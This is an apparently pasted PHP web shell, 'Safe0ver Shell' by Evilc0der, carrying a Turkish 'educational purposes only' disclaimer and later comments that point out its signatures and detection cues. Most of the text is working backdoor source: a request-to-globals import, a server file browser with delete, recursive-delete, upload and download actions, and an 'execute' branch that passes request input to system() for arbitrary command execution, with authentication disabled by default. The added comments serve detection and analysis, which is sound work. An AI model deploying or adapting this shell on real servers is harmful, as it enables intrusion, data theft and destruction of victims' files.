
Untitled

a guest
May 3rd, 2017
  1. <?php
  2.  
  3.  
  4. /*
  5. *****************************************************************************************
  6. * Safe0ver Shell //Safe Mod Bypass By Evilc0der *
  7. *****************************************************************************************
  8. * Evilc0der.org is a Platform Which You can Publish Your Shell Script *
  9.  
  10. *****************************************************************************************
  11.  
  12. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  13. !! Dikkat ! Script Egitim Amacli Yazilmistir.Scripti Kullanarak Yapacaginiz Illegal eylemlerden sorumlu Degiliz.
  14. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  15. */
  16.  
  17.  
/* Setting some environment variables... */

/* Name of this script file; it is used as the target of the forms the page
   renders. The author's note asks for the filename to be entered here.
   NOTE(review): $idi0t is not assigned anywhere in the visible code, so as
   pasted this leaves $SFileName empty. */
$SFileName=$idi0t;

/* uncomment the two following variables if you want to use http
authentication. This will password protect your PHPShell */
/* NOTE(review): both assignments are commented out in this copy, so no
   credentials are configured by default. */
//$http_auth_user = "phpshell"; /* HTTP Authorisation username, uncomment if you want to use this */
//$http_auth_pass = "phpshell"; /* HTTP Authorisation password, uncomment if you want to use this */

/* Turn off PHP error reporting for the whole request, so failures in the
   file and command operations below are not reported. */
error_reporting(0);
$PHPVer=phpversion();
/* True when the first character of the version string is 4 or higher. */
$isGoodver=(intval($PHPVer[0])>=4);
/* Fixed banner strings. They are echoed into an HTML comment and the page
   header further down, and $scriptTitle is part of the Basic-auth realm, so
   they are usable as content signatures when scanning web roots or responses. */
$scriptTitle = "Safe0ver";
$scriptident = "$scriptTitle By Evilc0der.org";

/* $urlAdd accumulates the request parameters as a query string (filled in by
   walkArray). $formAdd is not referenced again in the visible code. */
$urlAdd = "";
$formAdd = "";
  37.  
/* Copy every non-array entry of $array into a global variable named after its
   key, recursing into nested arrays, and append "key=urlencoded-value&" to the
   global $urlAdd.
   Called on the request arrays below, this has the same effect the old
   register_globals setting had: any request parameter can create or overwrite
   any global variable of the script ($cmd, $dir, $file, ...). Every use of
   those variables later in the file is therefore request-controlled input. */
function walkArray($array){
    while (list($key, $data) = each($array))
        if (is_array($data)) { walkArray($data); }
        else { global $$key; $$key = $data; global $urlAdd; $urlAdd .= "$key=".urlencode($data)."&";}
}
  43.  
/* Import all request parameters as globals (see walkArray). POST is walked
   last, so a POST value wins over a GET value of the same name.
   NOTE(review): PHP defines no $_PUT superglobal, so the first line only acts
   if something else created that variable. */
if (isset($_PUT)) walkArray($_PUT);
if (isset($_GET)) walkArray($_GET);
if (isset($_POST)) walkArray($_POST);


/* Cut $urlAdd at the first "s=r" (strpos() returns false when there is none,
   and strval(false) is ""), then append the marker again. The form targets the
   script generates therefore carry "s=r", and its links carry "cmd=" values;
   both are things to look for in web server access logs. */
$pos = strpos($urlAdd, "s=r");
if (strval($pos) != "") {
    $urlAdd= substr($urlAdd, 0, $pos);
}

$urlAdd .= "&s=r&";

/* Paging defaults for the directory listing; both can be supplied in the request. */
if (empty($Pmax))
    $Pmax = 125; /* Identifies the max amount of Directories and files listed on one page */
if (empty($Pidx))
    $Pidx = 0;

/* Normalise path separators in the request-supplied $dir and $file: collapse
   doubled backslashes and doubled slashes, then turn backslashes into forward
   slashes. No restriction to a base directory is applied. */
$dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir )));
$file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file )));
  63.  
/* Release date and version labels shown in the banner ("7 Subat 2007" is
   Turkish for 7 February 2007). */
$scriptdate = "7 Subat 2007";
$scriptver = "Bet@ Versiyon";
/* Directory checked on disk for the action icons, and the URL prefix used to
   reference them in the generated HTML. */
$LOCAL_IMAGE_DIR = "img";
$REMOTE_IMAGE_URL = "img";
/* Action name => icon file name. */
$img = array(
    "Edit" => "edit.gif",
    "Download" => "download.gif",
    "Upload" => "upload.gif",
    "Delete" => "delete.gif",
    "View" => "view.gif",
    "Rename" => "rename.gif",
    "Move" => "move.gif",
    "Copy" => "copy.gif",
    "Execute" => "exec.gif"
);

/* Replace each file name with an <img> tag when the icon exists locally,
   otherwise with a "[Action]" text label. */
while (list($id, $im)=each($img))
    if (file_exists("$LOCAL_IMAGE_DIR/$im"))
        $img[$id] = "<img height=\"16\" width=\"16\" border=\"0\" src=\"$REMOTE_IMAGE_URL/$im\" alt=\"$id\">";
    else
        $img[$id] = "[$id]";
  85.  
  86.  
  87.  
  88.  
/* HTTP AUTHENTICATION */

/* Send a Basic-auth challenge and stop when credentials are configured and the
   supplied ones are missing or different, or when $logoff is 1 and $noauth is
   "yes". The realm is "$scriptTitle $scriptver", a fixed string that can be
   matched in WWW-Authenticate response headers.
   NOTE(review): the values compared are ordinary globals checked with loose
   !=, and in this file walkArray can also write globals from request data, so
   this check should not be treated as real access control when assessing who
   could have used the script. */
if ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset($PHP_AUTH_USER) || $PHP_AUTH_USER != $http_auth_user || $PHP_AUTH_PW != $http_auth_pass) || (($logoff==1) && $noauth=="yes") ) {
    setcookie("noauth","");
    Header( "WWW-authenticate: Basic realm=\"$scriptTitle $scriptver\"");
    Header( "HTTP/1.0 401 Unauthorized");
    echo "Your username or password is incorrect";
    exit ;

}
  99.  
/* Return an <a> element whose text is $display and whose target is this
   script with the accumulated request parameters ($urlAdd) followed by $url.
   $display and $url are inserted into the HTML without escaping.
   NOTE(review): $SFileName is not declared global here, so it is undefined
   inside the function and the href starts at "?". */
function buildUrl($display, $url) {
    global $urlAdd;
    $url = $SFileName . "?$urlAdd$url";
    return "<a href=\"$url\">$display</a>";
}
  105.  
/* Return $mp copies of "&nbsp;" for horizontal spacing in the HTML output.
   NOTE(review): $ret is never initialised, so the function returns null
   rather than "" when $mp is 0 or negative. */
function sp($mp) {
    for ( $i = 0; $i < $mp; $i++ )
        $ret .= "&nbsp;";
    return $ret;
}
  111.  
/* Replace every space in $instr with "&nbsp;" so runs of spaces survive HTML rendering. */
function spacetonbsp($instr) { return str_replace(" ", "&nbsp;", $instr); }
  113.  
/* Delete a path: a directory is emptied recursively and then removed with
   rmdir(); anything else is removed with unlink(). Returns the result of that
   final rmdir() or unlink() call. The results of the recursive calls are
   ignored, and no check limits the path to a particular directory tree. */
function Mydeldir($Fdir) {
    if (is_dir($Fdir)) {
        /* @ hides the warning if the directory cannot be opened; the handle is
           not checked before it is passed to readdir(). */
        $Fh=@opendir($Fdir);
        /* The loop ends on the first falsy value from readdir(): the end of
           the listing, but also an entry literally named "0". */
        while ($Fbuf = readdir($Fh))
            if (($Fbuf != ".") && ($Fbuf != ".."))
                Mydeldir("$Fdir/$Fbuf");
        @closedir($Fh);
        return rmdir($Fdir);
    } else {
        return unlink($Fdir);
    }
}
  126.  
  127.  
/* Return the element at index 1 of $array (list() assigns index 0 to $key and
   index 1 to $data). The listing code passes it the result of each(), so it
   yields the value half of the current key/value pair. */
function arrval ($array) {
    list($key, $data) = $array;
    return $data;
}
  132.  
/* Format a byte count as a string with a unit suffix (B, KB, MB, GB, TB).
   Each step divides by 1024, written as /1.024 then /1000 with an intval() in
   between, which truncates the result to three decimal places. The comparison
   is strictly greater than 1024, so a value of exactly 1024 stays in the
   smaller unit. */
function formatsize($insize) {
    $size = $insize;
    $add = "B";
    if ($size > 1024) {
        $size = intval(intval($size) / 1.024)/1000;
        $add = "KB";
    }
    if ($size > 1024) {
        $size = intval(intval($size) / 1.024)/1000;
        $add = "MB";
    }
    if ($size > 1024) {
        $size = intval(intval($size) / 1.024)/1000;
        $add = "GB";
    }
    if ($size > 1024) {
        $size = intval(intval($size) / 1.024)/1000;
        $add = "TB";
    }
    return "$size $add";
}
  154.  
  155. if ($cmd != "downl") {
  156. ?>
  157.  
  158. <!-- <?php echo $scriptident ?>, <?php echo $scriptver ?>, <?php echo $scriptdate ?> -->
  159. <HTML>
  160. <HEAD>
  161. <STYLE>
  162. <!--
  163. A{ text-decoration:none; color:navy; font-size: 12px }
  164. body {
  165. font-size: 12px;
  166. font-family: arial, helvetica;
  167. scrollbar-width: 5;
  168. scrollbar-height: 5;
  169. scrollbar-face-color: white;
  170. scrollbar-shadow-color: silver;
  171. scrollbar-highlight-color: white;
  172. scrollbar-3dlight-color:silver;
  173. scrollbar-darkshadow-color: silver;
  174. scrollbar-track-color: white;
  175. scrollbar-arrow-color: black;
  176. background-color: #CCCCCC;
  177. }
  178. Table { font-size: 12px; }
  179. TR{ font-size: 12px; }
  180. TD{
  181. font-size: 12px;
  182. font-family: arial, helvetical;
  183. BORDER-LEFT: black 0px solid;
  184. BORDER-RIGHT: black 0px solid;
  185. BORDER-TOP: black 0px solid;
  186. BORDER-BOTTOM: black 0px solid;
  187. COLOR: black;
  188. background: #CCCCCC;
  189. }
  190. .border{ BORDER-LEFT: black 1px solid;
  191. BORDER-RIGHT: black 1px solid;
  192. BORDER-TOP: black 1px solid;
  193. BORDER-BOTTOM: black 1px solid;
  194. }
  195. .none { BORDER-LEFT: black 0px solid;
  196. BORDER-RIGHT: black 0px solid;
  197. BORDER-TOP: black 0px solid;
  198. BORDER-BOTTOM: black 0px solid;
  199. }
  200. .inputtext {
  201. background-color: #EFEFEF;
  202. font-family: arial, helvetica;
  203. border: 1px solid #000000;
  204. height: 20;
  205. }
  206. .lighttd { background: #F8F8F8;
  207. }
  208. .darktd { background: #CCCCCC;
  209. }
  210. input { font-family: arial, helvetica;
  211. }
  212. .inputbutton {
  213. background-color: #CCCCCC;
  214. border: 1px solid #000000;
  215. border-width: 1px;
  216. height: 20;
  217. }
  218. .inputtextarea {
  219. background-color: #CCCCCC;
  220. border: 1px solid #000000;
  221. scrollbar-width: 5;
  222. scrollbar-height: 5;
  223. scrollbar-face-color: #EFEFEF;
  224. scrollbar-shadow-color: silver;
  225. scrollbar-highlight-color: #EFEFEF;
  226. scrollbar-3dlight-color:silver;
  227. scrollbar-darkshadow-color: silver;
  228. scrollbar-track-color: #EFEFEF;
  229. scrollbar-arrow-color: black;
  230. }
  231. .top { BORDER-TOP: black 1px solid; }
  232. .textin { BORDER-LEFT: silver 1px solid;
  233. BORDER-RIGHT: silver 1px solid;
  234. BORDER-TOP: silver 1px solid;
  235. BORDER-BOTTOM: silver 1px solid;
  236. width: 99%; font-size: 12px; font-weight: bold; color: Black;
  237. }
  238. .notop { BORDER-TOP: black 0px solid; }
  239. .bottom { BORDER-BOTTOM: black 1px solid; }
  240. .nobottom { BORDER-BOTTOM: black 0px solid; }
  241. .left { BORDER-LEFT: black 1px solid; }
  242. .noleft { BORDER-LEFT: black 0px solid; }
  243. .right { BORDER-RIGHT: black 1px solid; }
  244. .noright { BORDER-RIGHT: black 0px solid; }
  245. .silver{ BACKGROUND: #CCCCCC; }
  246. body,td,th {
  247. color: #660000;
  248. }
  249. a:link {
  250. color: #000000;
  251. text-decoration: none;
  252. }
  253. a:hover {
  254. color: #00FF00;
  255. text-decoration: none;
  256. }
  257. a:active {
  258. color: #666666;
  259. text-decoration: none;
  260. }
  261. a:visited {
  262. text-decoration: none;
  263. }
  264. .style5 {
  265. color: #660000;
  266. font-weight: bold;
  267. }
  268. -->
  269. </STYLE>
  270. <TITLE><?php echo $SFileName ?></TITLE>
  271. <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"></HEAD>
  272. <body topmargin="0" leftmargin="0">
  273. <div style="position: absolute; background: #CCCCCC; z-order:10000; top:0; left:0; width: 100%; height: 100%;">
  274. <table nowrap width=100% border="0" cellpadding="0" cellspacing="0">
  275. <tr>
  276. <td width="100%" class="silver border"><center>
  277. <strong> <font size=3><?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?></font> </strong>
  278. </center></td>
  279. </tr>
  280. </table>
  281. <table width=100% height="100%" NOWRAP border="0">
  282. <tr NOWRAP>
  283. <td width="100%" NOWRAP><br>
  284.  
  285. <?php
  286. }
  287.  
  288. if ( $cmd=="dir" ) {
  289. $h=@opendir($dir);
  290. if ($h == false) {
  291. echo "<br><font color=\"red\">".sp(3)."\n\n\n\n
  292. Klas�r Listelenemiyor!L�tfen Bypass B�l�m�n� Deneyin.<br>".sp(3)."\n
  293. Script Gecisi Tamamlayamadi!
  294. <br><br>".sp(3)."\n
  295. Klas�re Girmek Icin yetkiniz Olduguna emin Olunuz...
  296. <br><br></font>\n\n\n\n";
  297. }
  298. if (function_exists('realpath')) {
  299. $partdir = realpath($dir);
  300. }
  301. else {
  302. $partdir = $dir;
  303. }
  304. if (strlen($partdir) >= 100) {
  305. $partdir = substr($partdir, -100);
  306. $pos = strpos($partdir, "/");
  307. if (strval($pos) != "") {
  308. $partdir = "<-- ...".substr($partdir, $pos);
  309. }
  310. $partdir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $partdir )));
  311. $dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir )));
  312. $file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file )));
  313. }
  314. ?>
  315. <form name="urlform" action="<?php echo "$SFileName?$urlAdd"; ?>" method="POST"><input type="hidden" name="cmd" value="dir">
  316. <table NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0">
  317. <tr>
  318. <td width="100%" class="silver border">
  319. <center>&nbsp;Safe0ver-Server File Browser...&nbsp;</center>
  320. </td>
  321. </tr>
  322. </table>
  323. <br>
  324. <table width="100%" border="0" cellpadding="0" cellspacing="0">
  325. <tr>
  326. <td class="border nobottom noright">
  327. &nbsp;Listeliyor:&nbsp;
  328. </td>
  329. <td width="100%" class="border nobottom noleft">
  330. <table width="100%" border="0" cellpadding="1" cellspacing="0">
  331. <tr>
  332. <td NOWRAP width="99%" align="center"><input type="text" name="dir" class="none textin" value="<?php echo $partdir ?>"></td>
  333. <td NOWRAP><center>&nbsp;<a href="javascript: urlform.submit();"><b>GiT<b></a>&nbsp;<center></td>
  334. </tr>
  335. </table>
  336.  
  337. </td>
  338. </tr>
  339. </table>
  340. <!-- </form> -->
  341. <table NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0" >
  342. <tr>
  343. <td width="100%" NOWRAP class="silver border">
  344. &nbsp;Dosya Adi&nbsp;
  345. </td>
  346. <td NOWRAP class="silver border noleft">
  347. &nbsp;Yapilabilecekler&nbsp;&nbsp;
  348. </td>
  349. <td NOWRAP class="silver border noleft">
  350. &nbsp;Boyut&nbsp;
  351. </td>
  352. <td width=1 NOWRAP class="silver border noleft">
  353. &nbsp;Yetkiler&nbsp;
  354. </td>
  355. <td NOWRAP class="silver border noleft">
  356. &nbsp;Son D�zenleme&nbsp;
  357. </td>
  358. <tr>
  359. <?php
  360.  
  361.  
  362. /* <!-- This whole heap of junk is the sorting section... */
  363.  
  364. $dirn = array();
  365. $filen = array();
  366. $filesizes = 0;
  367. while ($buf = readdir($h)) {
  368. if (is_dir("$dir/$buf"))
  369. $dirn[] = $buf;
  370. else
  371. $filen[] = $buf;
  372. }
  373. $dirno = count($dirn) + 1;
  374. $fileno = count($filen) + 1;
  375.  
/* usort() comparator for the directory listing: 0 for identical strings,
   otherwise ordered by the lower-cased names. Names that differ only in case
   are not identical, so they compare as 1 in both directions. */
function mycmp($a, $b){
    if ($a == $b) return 0;
    return (strtolower($a) < strtolower($b)) ? -1 : 1;
}
  380.  
  381. if (function_exists("usort")) {
  382. usort($dirn, "mycmp");
  383. usort($filen, "mycmp");
  384. }
  385. else {
  386. sort ($dirn);
  387. sort ($filen);
  388. }
  389. reset ($dirn);
  390. reset ($filen);
  391. if (function_exists('array_merge')) {
  392. $filelist = array_merge ($dirn, $filen);
  393. }
  394. else {
  395. $filelist = $dirn + $filen;
  396. }
  397.  
  398.  
  399. if ( count($filelist)-1 > $Pmax ) {
  400. $from = $Pidx * $Pmax;
  401. $to = ($Pidx + 1) * $Pmax-1;
  402. if ($to - count($filelist) - 1 + ($Pmax / 2) > 0 )
  403. $to = count($filelist) - 1;
  404. if ($to > count($filelist)-1)
  405. $to = count($filelist)-1;
  406. $Dcontents = array();
  407. For ($Fi = $from; $Fi <= $to; $Fi++) {
  408. $Dcontents[] = $filelist[$Fi];
  409. }
  410.  
  411. }
  412. else {
  413. $Dcontents = $filelist;
  414. }
  415.  
  416. $tdcolors = array("lighttd", "darktd");
  417.  
  418. while (list ($key, $file) = each ($Dcontents)) {
  419. if (!$tdcolor=arrval(each($tdcolors))) {
  420. reset($tdcolors);
  421. $tdcolor = arrval(each($tdcolors)); }
  422.  
  423. if (is_dir("$dir/$file")) { /* <!-- If it's a Directory --> */
  424. /* <!-- Dirname --> */
  425. echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).buildUrl( "[$file]", "cmd=dir&dir=$dir/$file") .sp(9)."</td>\n";
  426. /* <!-- Actions --> */
  427. echo "<td NOWRAP class=\"top right $tdcolor\"><center>".sp(2)."\n";
  428. /* <!-- Rename --> */
  429. if ( ($file != ".") && ($file != "..") )
  430. echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n";
  431. /* <!-- Delete --> */
  432. if ( ($file != ".") && ($file != "..") )
  433. echo sp(3).buildUrl( $img["Delete"], "cmd=deldir&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n";
  434. /* <!-- End of Actions --> */
  435. echo "&nbsp;&nbsp;</center></td>\n";
  436. /* <!-- Size --> */
  437. echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;</td>\n";
  438. /* <!-- Attributes --> */
  439. echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;&nbsp;\n";
  440. echo "<strong>D</strong>";
  441. if ( @is_readable("$dir/$file") ) {
  442. echo "<strong>R</strong>";
  443. }
  444. if (function_exists('is_writeable')) {
  445. if ( @is_writeable("$dir/$file") ) {
  446. echo "<strong>W</stong>";
  447. }
  448. }
  449. else {
  450. echo "<strong>(W)</stong>";
  451. }
  452. if ( @is_executable("$dir/$file") ) {
  453. echo "<Strong>X<strong>";
  454. }
  455. echo "&nbsp;&nbsp;</td>\n";
  456. /* <!-- Date --> */
  457. echo "<td NOWRAP class=\"top right $tdcolor\" NOWRAP>\n";
  458. echo "&nbsp;&nbsp;".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."&nbsp;&nbsp;";
  459. echo "</td>";
  460. echo "</tr>\n";
  461.  
  462. }
  463. else { /* <!-- Then it must be a File... --> */
  464. /* <!-- Filename --> */
  465. if ( @is_readable("$dir/$file") )
  466. echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).buildUrl( $file, "cmd=file&file=$dir/$file").sp(9)."</td>\n";
  467. else
  468. echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).$file.sp(9)."</td>\n";
  469. /* <!-- Actions --> */
  470. echo "<td NOWRAP class=\"top right $tdcolor\"><center>&nbsp;&nbsp;\n";
  471. /* <!-- Rename --> */
  472. echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n";
  473. /* <!-- Edit --> */
  474. if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) )
  475. echo buildUrl( $img["Edit"], "cmd=edit&file=$dir/$file").sp(3)."\n";
  476. /* <!-- Copy --> */
  477. echo buildUrl( $img["Copy"], "cmd=copy&file=$dir/$file")."\n";
  478. /* <!-- Move --> */
  479. if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) )
  480. echo sp(3). buildUrl( $img["Move"], "cmd=move&file=$dir/$file")."\n";
  481. /* <!-- Delete --> */
  482. echo sp(3). buildUrl( $img["Delete"], "cmd=delfile&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n";
  483. /* <!-- Download --> */
  484. echo sp(3). buildUrl( $img["Download"], "cmd=downl&file=$dir/$file")."\n";
  485. /* <!-- Execute --> */
  486. if ( @is_executable("$dir/$file") )
  487. echo sp(3).buildUrl( $img["Execute"], "cmd=execute&file=$dir/$file")."\n";
  488. /* <!-- End of Actions --> */
  489. echo sp(2)."</center></td>\n";
  490. /* <!-- Size --> */
  491. echo "<td NOWRAP align=\"right\" class=\"top right $tdcolor\" NOWRAP >\n";
  492. $size = @filesize("$dir/$file");
  493. If ($size != false) {
  494. $filesizes += $size;
  495. echo "&nbsp;&nbsp;<strong>".formatsize($size)."<strong>";
  496. }
  497. else
  498. echo "&nbsp;&nbsp;<strong>0 B<strong>";
  499. echo "&nbsp;&nbsp;</td>\n";
  500.  
  501. /* <!-- Attributes --> */
  502. echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;&nbsp;\n";
  503.  
  504. if ( @is_readable("$dir/$file") )
  505. echo "<strong>R</strong>";
  506. if ( @is_writeable("$dir/$file") )
  507. echo "<strong>W</stong>";
  508. if ( @is_executable("$dir/$file") )
  509. echo "<Strong>X<strong>";
  510. if (function_exists('is_uploaded_file')){
  511. if ( @is_uploaded_file("$dir/$file") )
  512. echo "<Strong>U<strong>";
  513. }
  514. else {
  515. echo "<Strong>(U)<strong>";
  516. }
  517. echo "&nbsp;&nbsp;</td>\n";
  518. /* <!-- Date --> */
  519. echo "<td NOWRAP class=\"top right $tdcolor\" NOWRAP>\n";
  520. echo "&nbsp;&nbsp;".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."&nbsp;&nbsp;";
  521. echo "</td>";
  522. echo "</tr>\n";
  523. }
  524. }
  525.  
  526. echo "</table><table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr>\n<td NOWRAP width=100% class=\"silver border noright\">\n";
  527. echo "&nbsp;&nbsp;".@count ($dirn)."&nbsp;Klas�r,&nbsp;".@count ($filen)."&nbsp;Dosya&nbsp;&nbsp;\n";
  528. echo "</td><td NOWRAP class=\"silver border noleft\">\n";
  529. echo "&nbsp;&nbsp;Toplam Dosya Boyutu:&nbsp;".formatsize($filesizes)."&nbsp;&nbsp;<td></tr>\n";
  530.  
/* Echo one pager entry labelled "| $a - $b |": as a link when $link is
   non-empty, as plain bold text otherwise (used for the current page).
   $a, $b and $link are written into the HTML without escaping; the callers
   pass fragments of file names as $a and $b. */
function printpagelink($a, $b, $link = ""){
    if ($link != "")
        echo "<A HREF=\"$link\"><b>| $a - $b |</b></A>";
    else
        echo "<b>| $a - $b |</b>";
}
  537.  
  538. if ( count($filelist)-1 > $Pmax ) {
  539. echo "<tr><td colspan=\"2\" class=\"silver border notop\"><table width=\"100%\" cellspacing=\"0\" cellpadding=\"3\"><tr><td valign=\"top\"><font color=\"red\"><b>Page:</b></font></td><td width=\"100%\"><center>";
  540. $Fi = 0;
  541. while ( ( (($Fi+1)*$Pmax) + ($Pmax/2) ) < count($filelist)-1 ) {
  542. $from = $Fi*$Pmax;
  543. while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++;
  544. $to = ($Fi + 1) * $Pmax - 1;
  545. if ($Fi == $Pidx)
  546. $link="";
  547. else
  548. $link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi";
  549. printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link);
  550. echo "&nbsp;&nbsp;&nbsp;";
  551. $Fi++;
  552. }
  553. $from = $Fi*$Pmax;
  554. while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++;
  555. $to = count($filelist)-1;
  556. if ($Fi == $Pidx)
  557. $link="";
  558. else
  559. $link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi";
  560. printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link);
  561.  
  562.  
  563. echo "</center></td></tr></table></td></tr>";
  564. }
  565.  
  566.  
  567. echo "</table>\n<br><table NOWRAP>";
  568.  
  569. if ($isGoodver) {
  570. echo "<tr><td class=\"silver border\">&nbsp;<strong>PHP Versiyonu:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PHPVer&nbsp;</td></tr>\n";
  571. }
  572. else {
  573. echo "<tr><td class=\"silver border\">&nbsp;<strong>Server's PHP Version:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PHPVer (Some functions might be unavailable...)&nbsp;</td></tr>\n";
  574. }
  575. /* <!-- Other Actions --> */
  576. echo "<tr><td class=\"silver border\">&nbsp;<strong>Diger Islemler:&nbsp;&nbsp;</strong>&nbsp;</td>\n";
  577. echo "<td>&nbsp;<b>".buildUrl( "| Yeni Dosya |", "cmd=newfile&lastcmd=dir&lastdir=$dir")."\n".sp(3).
  578. buildUrl( "| Yeni Klas�r |", "cmd=newdir&lastcmd=dir&lastdir=$dir")."\n".sp(3).
  579. buildUrl( "| Dosya Y�kle |", "cmd=upload&dir=$dir&lastcmd=dir&lastdir=$dir"). "</b>\n</td></tr>\n";
  580. echo "<tr><td class=\"silver border\">&nbsp;<strong>Script Location:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PATH_TRANSLATED</td></tr>\n";
  581. echo "<tr><td class=\"silver border\">&nbsp;<strong>IP Adresin:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$REMOTE_ADDR&nbsp;</td></tr>\n";
  582. echo "<tr><td class=\"silver border\">&nbsp;<strong>Bulundugun Klas�r:&nbsp;&nbsp;</strong></td><td>&nbsp;$partdir&nbsp;</td></tr>\n";
  583. echo "<tr><td valign=\"top\" class=\"silver border\">&nbsp;<strong>Semboller:&nbsp;&nbsp;</strong&nbsp;</td><td>\n";
  584. echo "<table NOWRAP>";
  585. echo "<tr><td><strong>D:</strong></td><td>&nbsp;&nbsp;Klas�r.</td></tr>\n";
  586. echo "<tr><td><strong>R:</strong></td><td>&nbsp;&nbsp;Okunabilir.</td></tr>\n";
  587. echo "<tr><td><strong>W:</strong></td><td>&nbsp;&nbsp;Yazilabilir.</td></tr>\n";
  588. echo "<tr><td><strong>X:</strong></td><td>&nbsp;&nbsp;Komut Calistirilabilir.</td></tr>\n";
  589. echo "<tr><td><strong>U:</strong></td><td>&nbsp;&nbsp;HTTP Uploaded File.</td></tr>\n";
  590. echo "</table></td>";
  591. echo "</table>";
  592. echo "<br>";
  593. @closedir($h);
  594. }
elseif ( $cmd=="execute" ) {/*<!-- Execute the executable -->*/
    /* $file is a request-controlled global (see walkArray) and is handed to
       system() unchanged, so this branch runs an arbitrary OS command with the
       privileges of the PHP process and echoes its last output line (system()
       itself already prints the full output).
       Defensive relevance: a system() call on request data is a strong static
       indicator when scanning PHP files; at runtime it shows up as the web
       server or PHP worker spawning a shell; hosts that list system in
       disable_functions block this branch. */
    echo system("$file");
}
  598. elseif ( $cmd=="deldir" ) { /*<!-- Delete a directory and all it's files --> */
  599. echo "<center><table><tr><td NOWRAP>" ;
  600. if ($auth == "yes") {
  601. if (Mydeldir($file)==false) {
  602. echo "Could not remove \"$file\"<br>Permission denied, or directory not empty...";
  603. }
  604. else {
  605. echo "Successfully removed \"$file\"<br>";
  606. }
  607. echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a D�n\"></form>";
  608. }
  609. else {
  610. echo "Are you sure you want to delete \"$file\" and all it's subdirectories ?
  611. <form action=\"$SFileName?$urlAdd\" method=\"POST\">
  612. <input type=\"hidden\" name=\"cmd\" value=\"deldir\">
  613. <input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">
  614. <input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">
  615. <input type=\"hidden\" name=\"file\" value=\"$file\">
  616. <input type=\"hidden\" name=\"auth\" value=\"yes\">
  617. <input type=\"submit\" value=\"Yes\"></form>
  618. <form action=\"$SFileName?$urlAdd\" method=\"POST\">
  619. <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
  620. <input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
  621. <input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>";
  622. }
  623. echo "</td></tr></center>";
  624. }
  625. elseif ( $cmd=="delfile" ) { /*<!-- Delete a file --> */ echo "<center><table><tr><td NOWRAP>" ;
  626. if ($auth == "yes") {
  627. if (@unlink($file)==false) {
  628. echo "Could not remove \"$file\"<br>";
  629. }
  630. else {
  631. echo "Successfully removed \"$file\"<br>";
  632. }
  633. echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a D�n\"></form>";
  634. }
  635. else {
  636. echo "Are you sure you want to delete \"$file\" ?
  637. <form action=\"$SFileName?$urlAdd\" method=\"POST\">
  638. <input type=\"hidden\" name=\"cmd\" value=\"delfile\">
  639. <input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">
  640. <input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">
  641. <input type=\"hidden\" name=\"file\" value=\"$file\">
  642. <input type=\"hidden\" name=\"auth\" value=\"yes\">
  643.  
  644. <input type=\"submit\" value=\"Yes\"></form>
  645. <form action=\"$SFileName?$urlAdd\" method=\"POST\">
  646. <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
  647. <input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
  648. <input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>";
  649. }
  650. echo "</td></tr></center>";
  651. }
